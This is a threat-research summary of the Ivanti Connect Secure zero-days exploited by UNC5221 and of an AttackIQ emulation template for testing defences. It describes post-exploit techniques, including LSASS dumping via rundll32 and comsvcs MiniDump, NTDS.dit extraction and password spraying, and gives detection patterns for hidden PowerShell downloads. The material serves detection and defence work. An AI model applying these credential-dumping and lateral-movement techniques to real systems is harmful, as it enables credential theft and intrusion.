Threat Research

Response to Ivanti’s Recent Zero-day Vulnerability Exploitation

AttackIQ

Ivanti disclosed two zero-day vulnerabilities in Ivanti Connect Secure and Policy Secure that enable authentication bypass and command injection, which were quickly probed and exploited in the wild by an actor tracked as UNC5221. AttackIQ published an assessment template that emulates UNC5221 post-exploit TTPs to help organizations validate detection and prevention for these behaviors. #Ivanti #UNC5221

Keypoints

  • Ivanti disclosed CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) affecting Connect Secure and Policy Secure appliances.
  • Researchers observed immediate scanning activity and requests for non-public file paths on vulnerable Ivanti appliances before widespread exploitation reports emerged.
  • Adversary UNC5221 (UTA0178) exploited the vulnerabilities, trojanized legitimate device files, and deployed multiple custom malware families to maintain persistence.
  • AttackIQ released an assessment template that emulates post-exploit TTPs (discovery, collection, credential access, lateral movement, C2/ingress) to validate controls and detection pipelines.
  • Emulated techniques include nmap network scanning, 7zip archiving of collected data, LSASS memory dumping via rundll32/comsvcs MiniDump, RDP/SSH lateral movement, ingress tool transfer, and internet connection discovery via curl.
  • Recommended detections include hunting for comsvcs executions targeting LSASS and PowerShell/cmd usage patterns that indicate remote payload download (e.g., IWR/Invoke-WebRequest with DownloadData and Hidden flags).

MITRE Techniques

  • [T1046] Network Service Discovery – Used nmap to scan for hosts with open SMB, RDP, or LDAP ports to identify remotely accessible hosts; quote [‘This scenario uses nmap for scanning hosts that have open ports for Samba File Sharing (SMB), Remote Desktop (RDP), or Active Directory (LDAP) that would identify remotely accessible hosts to the attacker.’]
  • [T1560.001] Archive Collected Data: Archive via Utility – Compresses specified input files into a .7z archive using the 7zip binary to exfiltrate/collect data; quote [‘This scenario compresses all the specified input files with the given compression level to a .7z archive by executing the 7zip binary file.’]
  • [T1003.001] OS Credential Dumping: LSASS Memory – Dumps LSASS memory via rundll32.exe calling comsvcs.dll MiniDump to capture credential materials for later extraction; quote [‘Uses rundll32.exe with comsvcs.dll to call the MiniDump export that will dump the LSASS process memory to disk.’]
  • [T1021.001] Remote Services: Remote Desktop Protocol – Uses RDP to remotely connect to other assets with stolen credentials for lateral movement; quote [‘This scenario attempts to remotely connect to another accessible asset with stolen credentials.’]
  • [T1021.004] Remote Services: SSH – Initiates outbound SSH connections (to AttackIQ-hosted server in testing) to exercise outbound restrictions for lateral movement or C2; quote [‘This scenario will initiate an SSH connection to an external AttackIQ-hosted server to exercise restrictions in outbound traffic.’]
  • [T1105] Ingress Tool Transfer – Downloads additional payloads to memory and/or disk to deliver malware stages and test network/endpoint controls; quote [‘This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.’]
  • [T1016.001] Internet Connection Discovery – Uses curl to request a 3rd-party service that returns the external IP to validate internet access from the compromised host; quote [‘This scenario validates if the system is capable of accessing the internet by using the native curl utility to make a request to a legitimate 3rd party site that reports the external IP address used to access the domain.’]
  • [T1003.003] OS Credential Dumping: NTDS (suggested expansion) – Attempt to dump NTDS.dit and registry hives using ntdsutil.exe on a Domain Controller to extract Active Directory credentials; quote [‘This scenario will attempt to execute the ntdsutil.exe utility to dump the NTDS.dit file along with the SYSTEM and SECURITY registry hives.’]
  • [T1110.001] Brute Force: Password Spraying (suggested expansion) – Simulate SMB password spraying against port 445 to emulate credential brute-force attempts; quote [‘This scenario will simulate an SMB password spraying attack against an SMB server on port 445/TCP.’]

Indicators of Compromise

  • [CVE] Vulnerability identifiers – CVE-2023-46805, CVE-2024-21887 (vulnerabilities exploited to achieve auth bypass and command injection)
  • [File / Binary Names] binaries and DLLs referenced in techniques – rundll32.exe, comsvcs.dll (used to dump LSASS memory)
  • [Database / File] Active Directory artifacts – NTDS.dit, ntdsutil.exe (dumping suggested for Domain Controllers)
  • [Utilities / Commands] tooling used for collection and discovery – 7zip (7z), curl (and examples of PowerShell IWR/Invoke-WebRequest with DownloadData and Hidden flags)
  • [File integrity] appliance file tampering context – mismatched/trojanized legitimate appliance files reported by customers (no filenames provided)

Researchers observed immediate scanning and file-path probing of Ivanti Connect Secure devices following disclosure of CVE-2023-46805 and CVE-2024-21887, and customers reported mismatched (trojanized) files on appliances. The actor UNC5221 leveraged the two vulnerabilities to gain initial access, then maintained persistence by replacing or trojanizing legitimate binaries and deploying custom malware families.

AttackIQ’s assessment template reproduces the post-exploit TTPs to validate detection and prevention controls: network discovery via nmap to identify SMB/RDP/LDAP services; data collection by compressing artifacts into .7z archives using the 7zip binary; credential harvesting by dumping LSASS memory with rundll32.exe/comsvcs.dll (MiniDump); lateral movement using RDP and outbound SSH; ingress/tool transfer tests that download payloads to memory or disk; and internet-connection discovery using curl to an external IP service. Recommended expansion scenarios include dumping NTDS.dit with ntdsutil.exe on domain controllers and simulating SMB password spraying to cover credential brute-force behaviors.

Detection guidance emphasizes monitoring for comsvcs/rundll32 executions targeting LSASS (e.g., Process Name == (comsvcs) and Command Line CONTAINS (‘lsass’)) and identifying native-utility download patterns (e.g., Process Name == (Cmd.exe OR Powershell.exe) with Command Line CONTAINS ((‘IWR’ OR ‘Invoke-WebRequest’) AND ‘DownloadData’ AND ‘Hidden’)). Organizations should first apply Ivanti’s patch and detection recommendations, then use the assessment template to validate controls and refine detections based on generated telemetry.

Read more: https://www.attackiq.com/2024/02/07/response-to-ivantis-zero-day-vulnerability-exploitation/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint